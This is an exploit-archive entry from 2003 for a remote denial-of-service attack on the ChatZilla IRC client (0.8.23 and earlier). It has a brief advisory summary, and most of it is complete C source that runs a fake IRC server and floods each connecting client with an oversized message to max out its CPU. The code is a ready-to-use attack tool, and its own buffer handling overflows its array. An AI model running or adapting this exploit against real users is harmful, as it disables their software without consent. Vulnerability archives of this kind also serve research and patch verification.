ChatZilla 0.8.23 - Remote Denial of Service

2003-09-15T00:00:00
ID EXPLOITPACK:EA648F36340E40D15BD3DAAC289210D6
Type exploitpack
Reporter D4rkGr3y
Modified 2003-09-15T00:00:00

Description

ChatZilla 0.8.23 - Remote Denial of Service

                                        
                                            // source: https://www.securityfocus.com/bid/8627/info

It has been reported that ChatZilla is prone to a denial of service vulnerability. The problem arises as a remote attacker posing as an IRC server sends specially crafted requests to the client containg large strings.

If successful, an attack would lead to a denial of service in the client software.

It is not known if this condition could also be exploited to execute arbitrary code on the client.

ChatZilla versions 0.8.23 and prior are reported to be prone to this issue. 

/*
 *  ChatZilla <=v0.8.23 remote DoS exploit
 *
 *  by m00 Security // www.m00security.org
 *
 *  This sploit creats a fake irc-server on any port. Every connected
 *  ChatZilla-client will have cpu-usage 100%.
 *
 *  Complete advisory:
 *  www.m00security.org/adv/adv003.txt
 *
 *  -d4rkgr3y [d4rk@securitylab.ru]
 */

#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<unistd.h>
#include<signal.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

#define COUNT 60000
#define request "NOTICE AUTH :*** Welcome to fake m00 IRCd\n"

int main(int argc, char **argv)
{
        struct sockaddr_in db;
        int sock, i, len, lame;
        const c = COUNT;
        char buf[60000] = ":Serv 000 user666 :Welcome to the underworld";
        printf("\nChatZilla <=v0.8.23 remote DoS exploit // 
www.m00security.org\n\n");
        if (argc!=2){
                printf("[-] error in params. Usage\n %s port\n",argv[0]);
                exit(1);
        } else {
                printf("[~] Generating evil buf....");
        }
        /* constructing evil buf */
        for (i=0;i<c;i++)
        {
                strcat(buf,"A");
        }
        strcat(buf,"\n");
        printf(" OK\n");
        /* creating fake irc-server */
        db.sin_family = AF_INET;
        db.sin_addr.s_addr = INADDR_ANY;
        db.sin_port = htons(atoi(argv[1]));
        sock = socket(PF_INET, SOCK_STREAM, 0);
        if(bind(sock, (struct sockaddr*)&db, sizeof(db)) == -1) {
                perror("[-] bind()");
                _exit(0);
        }
        /* OK */
        printf("[+] fake ircd created on port %s\n",argv[1]);
        /* waiting for connect */
        listen(sock, SOMAXCONN);
        while(1) {
                printf("[+] User connected. Attacking....");
                len = sizeof(db);
                lame = accept(sock, (struct sockaddr*)&db, &len);
                /* go go go */
                write(lame,request,strlen(request));
                write(lame,buf,strlen(buf));
                printf(" OK\n");
                close(lame);
                close(sock);
                return(0);
        }
}